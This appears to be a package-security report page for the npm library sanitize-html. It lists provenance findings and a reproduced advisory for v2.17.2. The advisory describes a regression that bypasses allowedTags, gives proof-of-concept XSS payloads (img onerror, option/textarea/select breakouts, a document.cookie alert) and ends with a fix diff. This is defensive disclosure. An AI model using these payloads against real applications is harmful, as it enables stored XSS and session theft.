sanitize-html
Clean up user-submitted HTML, preserving allowlisted elements and allowlisted attributes on a per-element basis
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Keywords
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| dependencies | unvetted-dep:htmlparser2 | AI (dependencies): htmlparser2 is a legitimate dependency used by the real sanitize-html; not itself a risk signal. | ai | |
| dependencies | unvetted-dep:parse-srcset | AI (dependencies): parse-srcset is a legitimate dependency used by the real sanitize-html; not itself a risk signal. | ai |
v2.17.2
2 findingsCVSS 6.1 (MEDIUM) — CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N ## Summary Commit 49d0bb7 introduced a regression in sanitize-html that bypasses `allowedTags` enforcement for text inside `nonTextTagsArray` elements (`textarea` and `option`). Entity-encoded HTML inside these elements passes through the sanitizer as decoded, unescaped HTML, allowing injection of arbitrary tags including XSS payloads. This affects any application using sanitize-html that includes `option` or `textarea` in its `allowedTags` configuration. ## Details The vulnerable code is at `packages/sanitize-html/index.js:569-573`: ```javascript } else if ((options.disallowedTagsMode === 'discard' || options.disallowedTagsMode === 'completelyDiscard') && (nonTextTagsArray.indexOf(tag) !== -1)) { // htmlparser2 does not decode entities inside raw text elements like // textarea and option. The text is already properly encoded, so pass // it through without additional escaping to avoid double-encoding. result += text; } ``` The comment is factually incorrect. htmlparser2 10.x **does** decode HTML entities inside both `<textarea>` and `<option>` elements before passing text to the `ontext` callback. This can be verified: ```javascript const htmlparser2 = require('htmlparser2'); const parser = new htmlparser2.Parser({ ontext(text) { console.log(JSON.stringify(text)); } }); parser.write('<option><script></option>'); // Outputs: "<", "script", ">" — entities are decoded ``` Because the code assumes the text is "already properly encoded" and skips `escapeHtml()`, the decoded entities (`<`, `>`) are written directly to the output as literal HTML characters. This completely bypasses the `allowedTags` filter — any tag can be injected inside an allowed `option` or `textarea` element using entity encoding. The execution flow: 1. Attacker submits: `<option><img src=x onerror=alert(1)></option>` 2. htmlparser2 parses and decodes entities → `ontext` receives `<img src=x onerror=alert(1)>` 3. Code at line 569 checks: tag is `option`, which is in `nonTextTagsArray` → true 4. Line 573: `result += text` — writes decoded text directly without escaping 5. Output: `<option><img src=x onerror=alert(1)></option>` — `<img>` tag injected despite not being in `allowedTags` The `script` and `style` tags are handled separately at lines 563-568 (before the vulnerable block), so the effective vulnerability applies to `textarea` and `option`, plus any custom elements added to `nonTextTags` by the user. Prior to commit 49d0bb7, text in these elements fell through to the `escapeHtml` branch (line 574-580), which correctly re-encoded the decoded entities. ## PoC **Prerequisites:** Application using sanitize-html 2.17.2 with `option` or `textarea` in `allowedTags`. **Step 1: Basic tag injection via option** ```javascript const sanitize = require('sanitize-html'); const output = sanitize( '<option><script>alert(1)</script></option>', { allowedTags: ['option'] } ); console.log(output); // Expected (safe): <option><script>alert(1)</script></option> // Actual (vulnerable): <option><script>alert(1)</script></option> ``` **Step 2: Element breakout with XSS event handler** ```javascript const output2 = sanitize( '<option></option><img src=x onerror=alert(document.cookie)></option>', { allowedTags: ['option'] } ); console.log(output2); // Output: <option></option><img src=x onerror=alert(document.cookie)></option> // The <img> tag escapes the option context and executes the onerror handler ``` **Step 3: Textarea breakout (also vulnerable)** ```javascript const output3 = sanitize( '<textarea></textarea><img src=x onerror=alert(1)></textarea>', { allowedTags: ['textarea'] } ); console.log(output3); // Output: <textarea></textarea><img src=x onerror=alert(1)></textarea> ``` **Step 4: Full select/option context breakout** ```javascript const output4 = sanitize( '<select><option></option></select><img src=x onerror=alert(1)></option></select>', { allowedTags: ['select', 'option'] } ); console.log(output4); // Output: <select><option></option></select><img src=x onerror=alert(1)></option></select> // Breaks out of both option and select elements ``` All outputs verified against sanitize-html 2.17.2 with htmlparser2 10.x. ## Impact - **Complete `allowedTags` bypass**: Any HTML tag can be injected through an allowed `option` or `textarea` element using entity encoding, defeating the core security guarantee of sanitize-html. - **Stored XSS**: Applications that sanitize user-submitted HTML and allow `option` or `textarea` tags (common in form builders, CMS platforms, rich text editors) are vulnerable to stored cross-site scripting. - **Session hijacking**: Attackers can inject event handlers (`onerror`, `onload`, etc.) to steal session cookies or authentication tokens. - **Scope**: Affects non-default configurations only — the default `allowedTags` does not include `option` or `textarea`. However, these tags are commonly allowed in applications that handle form-related HTML content. ## Recommended Fix Remove the vulnerable code block at lines 569-573 entirely. The `escapeHtml` branch (line 574) correctly handles these elements — htmlparser2 10.x decodes entities, and re-encoding with `escapeHtml` produces correct HTML output (entities are round-tripped, not double-encoded). ```diff --- a/packages/sanitize-html/index.js +++ b/packages/sanitize-html/index.js @@ -566,11 +566,6 @@ function sanitizeHtml(html, options, _recursing) { // your concern, don't allow them. The same is essentially true for style tags // which have their own collection of XSS vectors. result += text; - } else if ((options.disallowedTagsMode === 'discard' || options.disallowedTagsMode === 'completelyDiscard') && (nonTextTagsArray.indexOf(tag) !== -1)) { - // htmlparser2 does not decode entities inside raw text elements like - // textarea and option. The text is already properly encoded, so pass - // it through without additional escaping to avoid double-encoding. - result += text; } else if (!addedText) { const escaped = escapeHtml(text, false); if (options.textFilter) { ``` This fix restores the pre-49d0bb7 behavior where all non-script/style text content goes through `escapeHtml()`, ensuring decoded entities are properly re-encoded before output.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v2.17.1
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v2.17.0
1 findingPackage was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.